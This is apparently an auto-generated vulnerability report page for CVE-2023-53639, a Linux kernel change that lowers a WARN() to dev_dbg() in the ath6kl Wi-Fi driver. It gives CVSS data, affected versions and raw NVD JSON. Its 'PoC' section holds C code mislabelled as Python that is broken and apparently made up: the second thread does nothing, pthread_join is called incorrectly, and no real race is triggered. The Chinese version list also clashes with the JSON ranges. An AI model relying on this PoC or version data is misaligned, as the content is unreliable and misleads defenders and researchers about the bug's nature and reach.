Security Vulnerability Report
中文
CVE-2023-53639 CVSS 5.5 MEDIUM

CVE-2023-53639

Published: 2025-10-07 16:15:47
Last Modified: 2026-02-03 22:30:06
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: wifi: ath6kl: reduce WARN to dev_dbg() in callback The warn is triggered on a known race condition, documented in the code above the test, that is correctly handled. Using WARN() hinders automated testing. Reducing severity.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux内核 < 6.6 (多个稳定分支受影响)
Linux内核 6.6.x稳定版本
Linux内核 6.1.x LTS稳定版本
Linux内核 5.15.x LTS稳定版本
Linux内核 5.10.x LTS稳定版本
Linux内核 5.4.x LTS稳定版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2023-53639 // This vulnerability is triggered by inducing a known race condition in ath6kl driver callbacks // The original code uses WARN() which is reduced to dev_dbg() in the fix #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <pthread.h> #include <sys/socket.h> #include <linux/wireless.h> // Simulate triggering the race condition in ath6kl callback // This requires loading the ath6kl driver and performing WiFi operations volatile int trigger_race = 0; void* wifi_operation_thread(void* arg) { // Thread 1: Perform WiFi operations to trigger callbacks int sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock < 0) { perror("socket"); return NULL; } // Perform operations that trigger ath6kl callbacks // For example: scan, connect, disconnect operations struct iwreq wrq; memset(&wrq, 0, sizeof(wrq)); strncpy(wrq.ifr_name, "wlan0", IFNAMSIZ); // Trigger scan to invoke callbacks ioctl(sock, SIOCSIWSCAN, &wrq); close(sock); return NULL; } void* interrupt_thread(void* arg) { // Thread 2: Simulate interrupt or concurrent operation while (!trigger_race) { usleep(100); } // Force concurrent access to trigger race condition return NULL; } int main(int argc, char* argv[]) { printf("CVE-2023-53639 PoC - ath6kl WARN reduction\n"); printf("This PoC demonstrates triggering the race condition\n"); printf("that causes WARN() to fire in ath6kl callback.\n\n"); // Note: Actual exploitation requires: // 1. ath6kl driver loaded // 2. Compatible WiFi hardware // 3. Root or appropriate permissions // 4. Concurrent WiFi operations pthread_t t1, t2; pthread_create(&t1, NULL, wifi_operation_thread, NULL); pthread_create(&t2, NULL, interrupt_thread, NULL); // Wait for operations to complete sleep(2); trigger_race = 1; pthread_join(&t1, NULL); pthread_join(&t2, NULL); printf("Race condition triggered. Check dmesg for WARN output.\n"); printf("After fix: Only dev_dbg() output will appear (if debug enabled).\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53639", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:47.143", "lastModified": "2026-02-03T22:30:06.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath6kl: reduce WARN to dev_dbg() in callback\n\nThe warn is triggered on a known race condition, documented in the code above\nthe test, that is correctly handled. Using WARN() hinders automated testing.\nReducing severity."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.9", "versionEndExcluding": "4.14.315", "matchCriteriaId": "488DC5C7-598C-469A-81B8-CC24E08A79D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.283", "matchCriteriaId": "8AC1BC2D-A61C-4368-A3F6-50DF48E2EFC5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.243", "matchCriteriaId": "E54ACEF5-C8C1-4266-85FC-7D513FFD1DEC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.180", "matchCriteriaId": "78422AC3-CC89-479E-B4BC-62381D8F3564"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0d1792c98351b7c8ebdc53d052918e77d1e512c3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1300517e371e4d0acdb0f1237477e1ed223c3a9a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/484d95c69fc1143f09e4c2e3b89019d68d190a92", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/644df7e865e76ab7a62c67c25cbbc093c944d0ef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6f93154d61b345acbc405c6dee16afb845eb298e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/75c4a8154cb6c7239fb55d5550f481f6765fb83c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cbec770521ebc455c9811a23222faf8911422d4a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e7865f84adaf75cee1a4bbf79680329eca92b4e1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f2a429e6da37e32438a9adc250cc176a889c16a4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.